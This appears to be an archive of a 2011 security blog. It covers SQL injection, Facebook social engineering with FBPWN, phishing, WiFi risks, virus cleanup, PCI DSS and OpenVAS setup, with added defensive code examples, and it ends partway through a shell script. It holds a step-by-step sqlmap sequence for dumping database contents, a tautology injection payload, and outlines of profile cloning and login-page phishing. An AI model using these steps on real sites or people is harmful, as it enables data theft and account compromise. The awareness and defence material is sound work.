Saturday, October 22, 2011

Simple SQL Injection



A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system.

There are two complementary and successful methods of mitigating SQL injection attacks:

* Parameterized queries using bound, typed parameters
* Careful use of parameterized stored procedures

Parameterized queries are the easiest to adopt, and work in fairly similar ways among most web technologies in use today, including:

* Java
* .NET
* Perl
* PHP
* ColdFusion
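As an added illustration (not code from the original post), here is the same user lookup written both ways in Python against an in-memory SQLite database, so it runs offline; the users table and its rows are constructed sample data. The bound-parameter form is the same idea as prepared statements in JDBC, PDO, Perl DBI or ColdFusion's cfqueryparam: the client's input travels as a value the database compares, never as text it parses.

```python
"""Added example (not from the original post): the same login lookup written
the injectable way (string concatenation) and the safe way (bound parameter),
run against an in-memory SQLite table of constructed sample rows."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a throwaway users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    conn.commit()
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """The injectable pattern: user input is pasted straight into the SQL text,
    so whatever the client sends becomes part of the query grammar."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_parameterized(conn: sqlite3.Connection, username: str) -> list:
    """The fix the post recommends: a bound parameter. The driver hands the
    value to the engine separately from the query text, so it can only ever be
    compared as a string, never interpreted as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def demo() -> dict:
    """Run both lookups with a normal name and with the classic tautology."""
    conn = make_db()
    normal = "bob"
    # Closes the string literal and ORs in an always-true clause.
    tautology = "' OR '1'='1"
    return {
        "vuln_normal": find_user_vulnerable(conn, normal),
        "vuln_injected": find_user_vulnerable(conn, tautology),     # every row
        "param_normal": find_user_parameterized(conn, normal),
        "param_injected": find_user_parameterized(conn, tautology),  # no rows
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:15s} -> {rows}")
```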

The above video demonstrates a successful SQL injection attack using sqlmap. sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It can be found at http://sqlmap.sourceforge.net

Simple steps used in the video example:

### see if the page is injectable

1. './sqlmap.py -u http://yoursitehere.com/vulnerablefile'

### get database names

2. './sqlmap.py -u http://yoursitehere.com/vulnerablefile --dbs'

### get table names

3. './sqlmap.py -u http://yoursitehere.com/vulnerablefile -D databasename --tables'

### get column names

4. './sqlmap.py -u http://yoursitehere.com/vulnerablefile -D databasename -T tablename --columns'

### get the data

5. './sqlmap.py -u http://yoursitehere.com/vulnerablefile -D databasename -T tablename -C column1,column2 --dump'

Thursday, October 20, 2011

Another Facebook Attack



You may be a champ at Mafia Wars and Farmville, but what do you know about the security risks of social media sites? "Risk awareness is where it all starts!"

For example, think about when you first created your login with your bank or email. Common security questions are what town you grew up in, what street, your mother's maiden name, your high school, your favorite teacher, etc. How much of that information is on your social media sites? Now think about how many friends or relatives have talked about new banking fees and you offered up your two cents with "I've been using ABC Bank forever". With a little digging it's not too hard to get your information as well as your friends' and family's. In most cases just cloning your page is enough to get your friends to accept a friend request from a cloned account, and they in turn give up all the info needed to attack them, their friends and family.

How common are scams and hacks on social networks?

In 2009, Facebook officials announced they had surpassed 300 million users. Twitter claims to have 6 million unique monthly visitors and 55 million monthly visitors. With that kind of reach, it's not surprising that criminals view these sites as a great venue for finding victims. As a result, security stories about Twitter and Facebook have dominated the headlines in the past 12 months. In one high-profile story from 2009, hackers managed to hijack the Twitter accounts of more than 30 celebrities and organizations, including President Barack Obama and Britney Spears (see: Hackers Hijack Obama's, Britney's Twitter Accounts).

The above video is an example of FBPWN being used to gather information from a Facebook account. FBPWN is a cross-platform, Java-based Facebook social engineering framework: it sends friend requests to a list of Facebook profiles and polls for the acceptance notification. Once the victim accepts the invitation, it dumps all their information, photos and friend list to a local folder. It has extensible module interfaces and built-in modules for advanced social engineering tricks.

A typical hacking scenario starts with gathering information from a user's FB profile. The plugins are just a series of normal operations on FB, automated to increase the chance of you getting the info.

Typically, first you create a new blank account for the purpose of the test. Then the friending plugin runs first, adding all the friends of the victim (to have some common friends). Then the cloning plugin asks you to choose one of the victim's friends. The cloning plugin clones only the display picture and the display name of the chosen friend of the victim and sets them on the authenticated account. Afterwards, a friend request is sent to the victim's account. The dumper polls, waiting for the friend to accept. As soon as the victim accepts the friend request, the dumper starts to save all accessible HTML pages (info, images, tags, etc.) for offline examination.

http://code.google.com/p/fbpwn/

Tuesday, October 18, 2011

Social Engineering and Online Hacking



I hear it far too often, complete with that infernal cry of pain: "My Facebook (put whatever page you log into here) got hacked".

It may be your favorite social media site, or your bank or credit card login screen. You got there by clicking a link that someone sent to your email, or on that cool new site you found that lets you download free music. You reach that all too familiar screen that looks just like it always does, you log in, and blip, your login didn't work, try again. What just happened is that you gave up your login credentials without even realizing it.

How did my Facebook get hacked?

Step One: Hacker will clone your favorite login page. (No special tools needed: open up your favorite page in IE, go to File, click Save Page, and voilà, you have it.)

Step Two: Hacker sets up the page on his or her server, complete with a database back-end to collect results and a phony sub-domain to make it look even better ( http://facebook.freeserver.com ).

Step Three: Hacker will get you to his phony domain by sending you the link in an email, an IM, or even posted on another site. Maybe he or she already hacked one of your friends and you think it's your favorite aunt sending you the "check out the cool new app" link. Let's take a quick poll: how many of your friends or relatives could have clicked on a link someone they don't know sent them?

Step Four: Hacker uses your login credentials to hack your friends, your accounts, whatever he or she wants. You have been compromised, and a week from now you realize you just transferred all the funds in your bank account to an overseas account.

Moral of the story: Don't be lazy, always type the web address in, and remember you're probably smarter than most of your friends, so don't just click on some silly link they sent you.
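A defensive counterpart to the steps above, added here as an example and not part of the original post: a small Python check that classifies a link before any login form behind it is trusted. The expected domain, the sample URLs and the 'freeserver.com' host are constructed for illustration; the phony sub-domain it catches is the pattern the post describes, and it also catches the related trick of hiding the real host behind a user@ prefix.

```python
"""Added example (not from the original post): decide whether a link really
points at the site whose login page it imitates. The expected domain and all
sample URLs are constructed for illustration."""
from urllib.parse import urlsplit


def registrable_domain(host: str) -> str:
    """Return the last two labels of a hostname, e.g.
    'facebook.freeserver.com' -> 'freeserver.com'.
    Simplification: real public-suffix lists (co.uk, com.au, ...) need more
    than two labels; two is enough for the point made here."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def check_login_url(url: str, expected_domain: str) -> dict:
    """Classify a link before trusting a login form behind it.

    Returns the host the browser will actually talk to, its registrable
    domain, and the reasons (if any) the link should not be trusted."""
    parts = urlsplit(url.strip())
    host = parts.hostname or ""          # .hostname drops user@ and :port
    actual = registrable_domain(host)
    reasons = []
    if not host:
        reasons.append("no hostname in URL")
    elif actual != expected_domain.lower():
        reasons.append(f"host belongs to {actual}, not {expected_domain}")
        # The brand name used as a decoy label is the 'phony sub-domain'
        # trick from the post (facebook.freeserver.com).
        brand = expected_domain.split(".")[0].lower()
        if brand in host:
            reasons.append("brand name used as a decoy label in the host")
    if parts.username is not None:
        # https://www.facebook.com@evil.example/ -- everything before '@'
        # is credentials, not the site; the real host comes after it.
        reasons.append("URL carries a user@ prefix; real host is after '@'")
    if parts.scheme != "https":
        reasons.append("not HTTPS; credentials would travel in clear text")
    return {"host": host, "domain": actual,
            "trusted": not reasons, "reasons": reasons}


if __name__ == "__main__":
    # Constructed sample links: one genuine, two look-alikes.
    for u in ["https://www.facebook.com/login.php",
              "http://facebook.freeserver.com/login.php",
              "https://www.facebook.com@evil.example/login"]:
        print(u, "->", check_login_url(u, "facebook.com"))
```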

Wednesday, October 12, 2011

Public WiFi Not as Free as You Think!

We all love the convenience of WiFi to stay connected anywhere our laptops, tablets, and smart phones take us. We connect at airports, coffee shops, libraries, restaurants, and the slew of other available access points. Taking a look at http://www.wififreespot.com gives thousands of locations to connect for free across the country.

To bring up an old quote, "You get what you pay for". When accessing a public WiFi system it is important to understand the security issues. Specifically, a public WiFi system is often free, therefore cheaply provided, and its security is minimal. It is safe to assume that any safety measures are non-existent. Consequently, when a consumer uses a public WiFi site, their personal and confidential information transmitted over the Internet may be at risk of being stolen.

You never know what might be lurking out there. The bad guys have all kinds of tools at their disposal, and all of them are used to find information they can steal from you. It's important to know what you might be up against.

According to a 2010 report by Trustwave SpiderLabs, consumers' credit cards are more likely to be hacked in a hotel than in any other place they are used. Thirty-eight percent of the hacking incidents that Trustwave investigated last year occurred in hotel credit card systems.

In 2010, the Wyndham Hotels and Resorts – operators of The Days Inn, Ramada and Howard Johnson Hotel chains – reported that their networks had been compromised by hackers. The loot: An unknown number of guest names and credit card numbers.

Packet sniffers - These programs allow the interception of wireless transmissions via data packets. Packets are the form in which data is organized and sent across networks. If the packets are unencrypted, someone with a packet sniffer can see the information as plain text. That means your passwords, credit card numbers, and other information can be picked up and used by someone else.

Decoding Tools - Even "secure" hot spots can leave you exposed. Tools for decoding encrypted wireless communications are easily found and allow hackers to crack encryption keys. That means you still need to be on guard when you visit a hot spot that provides each visitor with passwords or other signs of secured networks.

Evil Twin or Wi-phishing - As with ordinary phishing, wi-phishing puts your identity in danger. Wi-phishing, or The Evil Twin, is a popular ruse in which criminals spoof wireless networks to deceive people like you into divulging confidential information by setting up a fake hot spot that you might innocently log into. This "evil twin" is ready to steal passwords, financial information, or whatever else you might be transmitting. Here's how it might work: Your coffee shop (or anywhere else you may be) uses a wireless service provider that charges a connection fee. To connect, you must provide a credit card number and certain personal information. In a wi-phishing scam, someone pre-empts the hot spot's wireless signal with one of his own by creating a "dummy" network that contains the name of the airline, hotel or coffee shop, replacing the sign-up page with a fake look-alike. You end up supplying your information to the spoofer, not the real hot spot provider. Once you're on the spoofed hot spot, you may be redirected to other fraudulent pages. The bottom line is that you’ve just given your credit card information to a phony site.

Below are some key steps to protecting your computer from intrusion:

Watch out for fake WiFi access points designed to look just like real hotel WiFi networks. These "Evil Twins" may even contain your hotel's name. Check with the establishment to get the correct name.

Find out whether your hotel’s wireless network uses WPA (WiFi Protected Access) security. WPA usually requires a password to get onto the network and always encrypts everything sent over wireless. This prevents eavesdropping over wireless – but it may not stop other guests connected to the same hotspot from stealing your data.

Always assume you’re not alone on any public WiFi network. Disable file sharing, turn on your computer’s personal firewall, and never send Social Security numbers, passwords or financial information when using an unencrypted wireless connection.

When using a free hotspot, you could be sending data through someone you don’t know. When using a commercial hotspot, never supply payment information to an unsecured hotspot login page. If your web browser does not display a green padlock or it warns that the login page may not be secure, use a different hotspot.

Use a VPN (virtual private network) to make all the information transmitted over your WiFi connection invisible to hackers.
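An added example, not from the original post, of the "check with the establishment" tip turned into a check you can run over a Wi-Fi scan: given the name and security mode the hotel says its network uses, flag access points that reuse that name with open security, a different hardware vendor prefix, or a look-alike name. The scan rows, BSSIDs and vendor prefix are all constructed.

```python
"""Added example (not from the original post): a heuristic that flags 'evil
twin' candidates in a Wi-Fi scan, i.e. an access point reusing the hotel's SSID
with a different BSSID or weaker security than the one the establishment
confirmed. Every scan row below is constructed."""
from collections import defaultdict

# Constructed scan results: (ssid, bssid, security).
SCAN = [
    ("HotelGuest", "00:11:22:33:44:01", "WPA2"),
    ("HotelGuest", "00:11:22:33:44:02", "WPA2"),       # second legitimate AP
    ("HotelGuest", "de:ad:be:ef:00:01", "OPEN"),       # same name, no encryption
    ("CoffeeShop", "66:77:88:99:aa:bb", "WPA2"),
    ("HotelGuest-Free", "de:ad:be:ef:00:02", "OPEN"),  # look-alike name
]

# What the front desk confirmed (constructed): the network's security mode and
# the first three bytes (vendor OUI) of the real access points' BSSIDs.
KNOWN_GOOD = {
    "HotelGuest": {"security": "WPA2", "bssid_prefix": "00:11:22"},
}


def find_evil_twins(scan, known_good):
    """Return [(ssid, bssid, [reasons])] for access points worth avoiding."""
    by_ssid = defaultdict(list)
    for ssid, bssid, security in scan:
        by_ssid[ssid].append((bssid, security))

    findings = []
    for ssid, aps in by_ssid.items():
        expected = known_good.get(ssid)
        modes = {security for _, security in aps}
        for bssid, security in aps:
            reasons = []
            # One name advertised both protected and open: someone is cloning
            # the name without knowing the key.
            if len(modes) > 1 and security == "OPEN":
                reasons.append("open AP shares an SSID that is also WPA-protected")
            if expected is not None:
                if security != expected["security"]:
                    reasons.append(
                        f"security is {security}, establishment says {expected['security']}"
                    )
                if not bssid.lower().startswith(expected["bssid_prefix"].lower()):
                    reasons.append("BSSID vendor prefix differs from the real access points")
            if reasons:
                findings.append((ssid, bssid, reasons))

    # Names that merely resemble a confirmed hotspot ("HotelGuest-Free").
    for ssid, aps in by_ssid.items():
        if ssid in known_good:
            continue
        for good in known_good:
            if good.lower() in ssid.lower():
                for bssid, _ in aps:
                    findings.append((ssid, bssid, [f"name mimics the known hotspot {good}"]))
    return findings


if __name__ == "__main__":
    for ssid, bssid, reasons in find_evil_twins(SCAN, KNOWN_GOOD):
        print(f"{ssid} ({bssid}): " + "; ".join(reasons))
```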
      

Monday, October 10, 2011

Computer Virus giving you the BLUES? Some tips might help.


Caught A Virus?

If you've let your guard down--or even if you haven't--it can be hard to tell if your PC is infected. Here's what to do if you suspect the worst.


Heard this one before? You must run antivirus software and keep it up to date or else your PC will get infected, you'll lose all your data, and you'll incur the wrath of every e-mail buddy you unknowingly infect because of your carelessness.

You know they're right. Yet for one reason or another, you're not running antivirus software, or you are but it's not up to date. Maybe you turned off your virus scanner because it conflicted with another program. Maybe you got tired of upgrading after you bought Norton Antivirus 2007, 2008, and 2009. Or maybe your annual subscription of virus definitions recently expired, and you've put off renewing.

It happens. It's nothing to be ashamed of. But chances are, either you're infected right now, as we speak, or you will be very soon.

For a few days in late January, the Netsky.p worm was infecting about 2,500 PCs a day. Meanwhile the MySQL bot infected approximately 100 systems a minute (albeit not necessarily desktop PCs). As David Perry, global director of education for security software provider Trend Micro, puts it, "an unprotected [Windows] computer will become owned by a bot within 14 minutes."

Today's viruses, worms, and so-called bots--which turn your PC into a zombie that does the hacker's bidding (such as mass-mailing spam)--aren't going to announce their presence. Real viruses aren't like the ones in Hollywood movies that melt down whole networks in seconds and destroy alien spacecraft. They operate in the background, quietly altering data, stealing private operations, or using your PC for their own illegal ends. This makes them hard to spot if you're not well protected.

Is Your PC "Owned?"

I should start by saying that not every system oddity is due to a virus, worm, or bot. Is your system slowing down? Is your hard drive filling up rapidly? Are programs crashing without warning? These symptoms are more likely caused by Windows, or badly written legitimate programs, rather than malware. After all, people who write malware want to hide their program's presence. People who write commercial software put icons all over your desktop. Who's going to work harder to go unnoticed?

Other warnings that may, in fact, indicate that there's nothing you need to worry about include:

* An automated e-mail telling you that you're sending out infected mail. E-mail viruses and worms typically come from faked addresses.
* A frantic note from a friend saying they've been infected, and therefore so have you. This is likely a hoax. It's especially suspicious if the note tells you the virus can't be detected but you can get rid of it by deleting one simple file. Don't be fooled--and don't delete that file.

I'm not saying that you should ignore such warnings. Copy the subject line or a snippet from the body of the e-mail and plug it into your favorite search engine to see if other people have received the same note. A security site may have already pegged it as a hoax.

Sniffing Out an Infection

There are signs that indicate that your PC is actually infected. A lot of network activity coming from your system (when you're not actually using Internet) can be a good indicator that something is amiss. A good software firewall, such as ZoneAlarm, will ask your permission before letting anything leave your PC, and will give you enough information to help you judge if the outgoing data is legitimate. By the way, the firewall that comes with Windows, even the improved version in XP Service Pack 2, lacks this capability.

To put a network status light in your system tray, follow these steps: In Windows XP, choose Start, Control Panel, Network Connections, right-click the network connection you want to monitor, choose Properties, check "Show icon in notification area when connected," and click OK.

If you're interested in being a PC detective, you can sniff around further for malware. By hitting Ctrl-Alt-Delete in Windows, you'll bring up the Task Manager, which will show you the various processes your system is running. Most, if not all, are legit, but if you see a file name that looks suspicious, type it into a search engine and find out what it is.

Want another place to look? In Windows XP, click Start, Run, type "services.msc" in the box, and press Enter. You'll see detailed descriptions of the services Windows is running. Something look weird? Check with your search engine.

Finally, you can do more detective work by selecting Start, Run, and typing "msconfig" in the box. With this tool you not only see the services running, but also the programs that your system is launching at startup. Again, check for anything weird.

If any of these tools won't run--or if your security software won't run--that in itself is a good sign your computer is infected. Some viruses intentionally disable such programs as a way to protect themselves.

What to Do Next

Once you're fairly sure your system is infected, don't panic. There are steps you can take to assess the damage, depending on your current level of protection.

* If you don't have any antivirus software on your system (shame on you), or if the software has stopped working, stay online and go for a free scan at one of several Web sites. There's McAfee FreeScan, Symantec Security Check, and Trend Micro's HouseCall. If one doesn't find anything, try two. In fact, running a free online virus scan is a good way to double-check the work of your own local antivirus program. When you're done, buy or download a real antivirus program.
* If you have antivirus software, but it isn't active, get offline, unplug wires-- whatever it takes to stop your computer from communicating via the Internet. Then, promptly perform a scan with the installed software.
* If nothing seems to be working, do more research on the Web. There are several online virus libraries where you can find out about known viruses. These sites often provide instructions for removing viruses--if manual removal is possible--or a free removal tool if it isn't. Check out GriSOFT's Virus Encyclopedia, Eset's Virus Descriptions, McAfee's Virus Glossary, Symantec's Virus Encyclopedia, or Trend Micro's Virus Encyclopedia.

A Microgram of Prevention

Assuming your system is now clean, you need to make sure it stays that way. Preventing a breach of your computer's security is far more effective than cleaning up the mess afterwards. Start with a good security program, such as Trend Micro's PC-Cillin, which you can buy for $50.

Don't want to shell out any money? You can cobble together security through free downloads, such as AVG Anti-Virus Free Edition, ZoneAlarm (a personal firewall), and Ad-Aware SE (an antispyware tool).

Just make sure you keep all security software up to date. The bad guys constantly try out new ways to fool security programs. Any security tool without regular, easy (if not automatic) updates isn't worth your money or your time.

Speaking of updating, the same goes for Windows. Use Windows Update (it's right there on your Start Menu) to make sure you're getting all of the high priority updates. If you run Windows XP, make sure to get the Service Pack 2 update. To find out if you already have it, right-click My Computer, and select Properties. Under the General tab, under System, it should say "Service Pack 2."

Here are a few more pointers for a virus-free life:

* Be careful with e-mail. Set your e-mail software security settings to high. Don't open messages with generic-sounding subjects that don't apply specifically to you from people you don't know. Don't open an attachment unless you're expecting it.
* If you have broadband Internet access, such as DSL or cable, get a router, even if you only have one PC. A router adds an extra layer of protection because your PC is not connecting directly with the Internet.
* Check your Internet ports. These doorways between your computer and the Internet can be open, in which case your PC is very vulnerable; closed, but still somewhat vulnerable; or stealthed (or hidden), which is safest. Visit Gibson Research's Web site and run the free ShieldsUP test to see your ports' status. If some ports show up as closed--or worse yet, open--check your router's documentation to find out how to hide them.

Friday, October 07, 2011

If you are not yet PCI compliant get there now.

If you are a Payment Card Merchant and are not yet PCI DSS compliant, take notice. It could end up being one of the biggest costs in penalties your company could incur.

High-profile cases involving big corporations have hit the headlines in the last couple of years. The Payment Card Industry has threatened huge fines against some larger merchants of up to $25,000 per month until compliance is obtained. In the high-profile case of TJX (owner of T.J. Maxx, Marshalls, Home Goods and A.J. Wright retail chains), the company reported spending $202 million because of the PCI violation that compromised the card-holder account information of as many as 40 million customers. The money is being spent to handle more than 20 lawsuits brought against it by banks and consumers in the U.S. and Canada and to pay settlements with credit-card associations. I don't see how the smaller business owner can gamble with the penalties for non-compliance.

If you are one of these businesses and are not yet compliant, you are constantly at risk of losing sensitive card-holder data, which will most likely result in PCI DSS fines, legal action and bad publicity. Organizations that fail to comply face fines of up to $500,000 if the data is lost or stolen and risk not being allowed to handle card-holder data. Theft of sensitive information such as credit card information comes not only from external threats but from insider threats as well. The PCI Security Standards Council website provides a wealth of information for understanding and navigating the PCI DSS. User forums such as the LinkedIn PCI DSS Compliance Specialist group and vendor blogs and websites are also good sources of free information.

Is PCI compliance a law? The short answer is no. The long answer is that while it is not currently a federal law, there are state laws that are already in effect (and some that may go into effect) to force components of the PCI Data Security Standard (PCI DSS) into law. In addition, there is a big push by legislatures and industry trade association to enact a federal law around data security and breach notification.

While the credit card companies may have ZERO legal authority to levy fines on any business, all the merchant card agreements I've read include a clause where the merchant agrees to pay all fines from the card brand that were incurred by the bank. Check your merchant agreement's small print.

Taking a look at Visa, Inc.'s agreement, it states: "PCI DSS compliance is required of all entities that store, process, or transmit Visa cardholder data, including financial institutions, merchants and service providers. The PCI DSS applies to all payment channels, including retail (brick-and-mortar), mail/telephone order, and e-commerce. Visa Inc.'s compliance programs manage compliance with the PCI DSS with the required program validation."

PCI DSS has created and imposed a comprehensive list of standard requirements which companies are to adhere to in order to ensure that the account data of all customers is protected. Essentially, if your organization processes any form of credit card information during your business practices then your company should be compliant to the PCI DSS standards.

Wednesday, October 05, 2011

My OS, IDE, and Tools of the Trade

Working as an Application Security Analyst as well as being a custom Application Developer requires a unique set-up for me. Starting with the OS: most of my security tools are Linux based, or for me seem to run better on a Linux OS (Nessus, Nmap, Nikto, John the Ripper, Hydra), so BackTrack is my operating system of choice. I do have a virtual Windows machine for the occasions where I may need a Microsoft program such as Brutus or Adobe's CS5, but find myself rarely cranking it up. On that note, being a Flex developer, Adobe deciding to no longer support Flex / Flash Builder on Linux was a big downside. Also of note is deciding on a way to connect to Microsoft SQL servers during development.

With BackTrack covering most of my security tools, I threw in my favorite browser Chrome, as well as the OpenOffice suite and xPDF to cover reporting and opening Microsoft Office files, and I added the Sun Java install.

For Java, PHP, ColdFusion, and Flex development I start with XAMPP and ColdFusion server installs, and Eclipse has me covered with a few plugins for coding. I start with the PHP Helios version of Eclipse located here; the benefit is that it has all the tools already installed for my PHP and Java development. I have added the following plug-ins to complete the install:

* QuantumDB - allows me to connect to several DBMSs including DB2, Oracle, MS SQL and MySQL
* CFEclipse - handles my ColdFusion development
* Subclipse - SVN check-in and check-out (there are several version control plug-ins for different systems including Perforce and VSS; just look around for the one you need)
* fbForLinux - takes care of my Flex development on Linux, works great and allows me to do AIR development as well (no design view)
* Adobe AIR for Linux - this will allow me to install the Design View AIR application for Flex. I rarely use it, coming from a hand-coding background, but sometimes it is nice to see your Flex application in design view.

A few Wine programs I install:

* SQLyog - although for the most part I stick with the QuantumDB plug-in for database development, from time to time I do use SQLyog for MySQL development; it runs fine with Wine
* ScreenCalipers - when I need to see some sizes this works great
* fsCapture - there may be better Linux equivalents, I'm just used to using this one


For BackTrack 5 you may want to add the Ubuntu Software Center for other apps you may want; in a terminal type [ apt-get install software-center ].

That about covers my basic set up. I keep a Live CD with the above already installed so when I need to set up a new machine I have a quick start.


http://www.wiredwizard.net

Monday, October 03, 2011

5 Tips for Social Media Marketing

Facebook, Twitter, LinkedIn, MySpace, and the list goes on and on. SEOmoz has a list of the top 25 social media marketing sites at http://www.seomoz.org/article/social-media-marketing-tactics .

In 2009, the population of Facebook surpassed that of the U.S.A. In just over two years, it is now double the population of the US. If Facebook were a nation, they would be the 3rd largest in the world.

The impact of this on marketing through Social Media management is staggering. Big corporations are quickly catching on to the power of Social Media Marketing, which includes Twitter marketing. For the first time, in 2010, ending a 23 year run, Pepsi Cola pulled out of advertising in the Super Bowl ditching it for Social Media.

The phenomenal growth of Social Media (texting, blogging, networking) has the attention of every major company. Social Media Management has become an essential component in today's business. So how do you leverage the power of Social Media for your company?

The days of "build it and they will come" are long gone. Here are a few tips for your SMO efforts.

1.    Avoid Spam.

The first social media marketing rule that you should remember is to avoid SPAM as much as possible. The way to be successful with social media marketing is not to push your website onto your target market by spamming, but rather the opposite: building effective relationships and leveraging them in the long run.

2.    Don’t leave any social media profiles unattended.

Active participation is a basic necessity of any social media marketing campaign. Just creating some profiles in a handful of social media sites doesn’t do any good. You should post some content to the social media profiles frequently and make them look lively.

3.    Be transparent, honest, relevant, committed and value minded.

You need to build trust and loyalty with your audience. Offer suggestions, provide feedback and answer specific questions. Furthermore, do not always try to sell to them. Try to understand the needs of the consumer instead of forcing yourself on your customer. Your customers want to connect with the real people behind the company and know what you are doing and planning to do.

4. Seek input as well as putting out your messages.

Spend some time asking people what they want, or what they would like to know. Get to know your market's needs. Follow up: answer their questions, reply to comments, be proactive.

5. Use the tools the Social Media Sites have already given you.

Take advantage of the extra applications that can be added to your page. You can add a button for visitors to share the site with their friends, create events and giveaways, create fan pages, etc. Explore all the tools each of the Social Media sites offers.


Be imaginative and interactive, think about hiring some help to get your Social Media efforts kicked off right. Build relationships and they will come.


http://www.wiredwizard.net

Saturday, October 01, 2011

How does PCI-DSS Compliance affect your on-line efforts?

Pre-Internet, when you thought of a store being robbed you pictured the masked bandit with a gun standing in front of the cashier demanding the drawer, or maybe a more optimistic view of a shoplifter, or a shady employee dropping merchandise out the back door. My, how times have changed.

Enter today's modern cyber-thieves; they operate in stealth from behind the anonymous veil of their computer screen. No longer the masked bandit with a gun and a bad upbringing, now it could be a bored teen with a new hacking script, a grandmother who learned a trick from the kids to get a discount on a form order, the 35-year-old laid-off white-collar developer who found out he could sell credit-card numbers or even just sales leads through his IRC account, and add to them the countless other cyber-thief profiles.

They attack companies small to big, municipalities, churches, etc., looking for any identity information, credit-card information, as well as other related information that may get them into additional resources that might provide them with information they can use.

In 2009, one of the victims of cybercrime, the Catholic Diocese in Des Moines, Iowa, lost about $680,000. The church is puzzled how the cyber criminals entered the church accounts, but the thieves "took all they could" before bank officials realized what had transpired, in just two days.

“No one country, no one company, and no one agency can stop cybercrime,” said FBI Director Robert S. Mueller III, in an agency statement. “The only way to do that is by standing together. For ultimately, we all face the same threat. Together, the FBI and its international partners can and will find better ways to safeguard our systems, minimize these attacks, and stop those who would do us harm.” So how does the small on-line merchant help with this effort? Enter PCI Compliance.

According to Verizon Business and the U.S. Secret Service, payment card data theft makes up more than half of all data breaches investigated and has hit organizations of all sizes, from Mom and Pop on-line shops where there is rarely an IT budget for security (what better target could there be?) to large corporations that process billions of dollars in on-line credit-card sales.

One source that merchants can use as a guide is the Payment Card Industry Data Security Standard (PCI DSS), which is the minimum security the credit card brands expect from a merchant who accepts credit cards. The current standard can be found at https://www.pcisecuritystandards.org/.

In PCI, a merchant can find several security measures designed to deter hackers from attempting to steal their credit card data. Even if a mom-and-pop restaurant cannot meet all PCI standards, it would be better to implement the security measures that are practical today than to ignore the problem altogether.

PCI DSS is the core standard for merchants and processors. It addresses security technology controls and processes for protecting card-holder data. If your organization accepts just one card for payment on-line you must comply with PCI DSS. Validation of compliance is done annually by an external Qualified Security Assessor (QSA) for organizations handling large volumes of transactions, or by Self-Assessment Questionnaire (SAQ) for companies handling smaller volumes.

Although the PCI DSS requirements must be implemented by all entities that process, store or transmit account data, formal validation of PCI DSS compliance is not mandatory for all entities. Currently both Visa and MasterCard require merchants and service providers to be validated according to the PCI DSS.

The six control objectives:

Build and Maintain a Secure Network
  • Install and maintain a firewall configuration to protect cardholder data
  • Do not use vendor-supplied defaults for system passwords and other security parameters
Protect Cardholder Data
  • Protect stored cardholder data
  • Encrypt transmission of cardholder data across open, public networks
Maintain a Vulnerability Management Program
  • Use and regularly update anti-virus software on all systems commonly affected by malware
  • Develop and maintain secure systems and applications
Implement Strong Access Control Measures
  • Restrict access to cardholder data by business need-to-know
  • Assign a unique ID to each person with computer access
  • Restrict physical access to cardholder data
Regularly Monitor and Test Networks
  • Track and monitor all access to network resources and cardholder data
  • Regularly test security systems and processes
Maintain an Information Security Policy
  • Maintain a policy that addresses information security
PCI Compliance Help for Small Businesses with a Limited IT Security Budget

In order to find out whether your business is PCI compliant, the first and most crucial step is to complete a PCI Self-Assessment Questionnaire. Following this process will tell you whether your business is compliant; if it is not, there are established steps you can take to achieve compliance. Please feel free to contact me if you need information or help with the PCI Self-Assessment Questionnaire.

Tuesday, August 23, 2011

OpenVAS

The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.

The actual security scanner is accompanied by a daily updated feed of Network Vulnerability Tests (NVTs), over 20,000 in total (as of January 2011).

All OpenVAS products are Free Software. Most components are licensed under the GNU General Public License (GNU GPL).


Starting OpenVAS with Greenbone Security Desktop as the scanning interface

From the menu select

Openvas NVT sync

Start Openvas scanner

then in a terminal window

openvasmd --rebuild
openvasmd -p 9390 -a 127.0.0.1
openvasad -a 127.0.0.1 -p 9393
gsad --http-only --listen=127.0.0.1 -p 9392

Then from the menu

Start Greenbone Security Desktop

and login

You are now ready to set up your scanning tasks.

Starting OpenVAS with a web browser as the scanning interface

From the menu select

Openvas NVT sync

Start Openvas scanner

then in a terminal window

openvasmd --rebuild
openvasmd -p 9390 -a 127.0.0.1
openvasad -a 127.0.0.1 -p 9393
gsad --http-only --listen=127.0.0.1 -p 9392

Then open your browser to the address

http://127.0.0.1:9392
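Both procedures above type the same four daemon commands by hand, and nothing tells you whether a daemon actually came up before the next one tries to talk to it. The script below is an added example, not from the original post or from the OpenVAS project: it runs the sequence once, refuses to bind anywhere except loopback, and waits for each port to accept connections before starting the daemon that depends on it. It assumes the two menu entries correspond to the command-line tools openvas-nvt-sync and openvassd (the scanner listens on port 9391 by default); the OPENVAS_BIND variable and the timeouts are this script's own.

```shell
#!/bin/bash
# Added example (not from the original post): start the OpenVAS daemons in the
# order the post gives, bound to loopback only, waiting for each listener.
# Assumptions: openvas-nvt-sync / openvassd stand in for the two menu items,
# the scanner listens on 9391, OPENVAS_BIND and the timeouts are ours.

BIND="${OPENVAS_BIND:-127.0.0.1}"   # -a / --listen address for every daemon
SCANNER_PORT=9391                   # openvassd (OTP)
MANAGER_PORT=9390                   # openvasmd (OMP)
ADMIN_PORT=9393                     # openvasad (OAP)
WEB_PORT=9392                       # gsad, Greenbone Security Assistant

# is_loopback ADDR: true only for addresses that cannot be reached from the
# network. Binding the manager/administrator/web ports anywhere else exposes
# the scanner's admin plane, and gsad here runs --http-only (no TLS).
is_loopback() {
  case "$1" in
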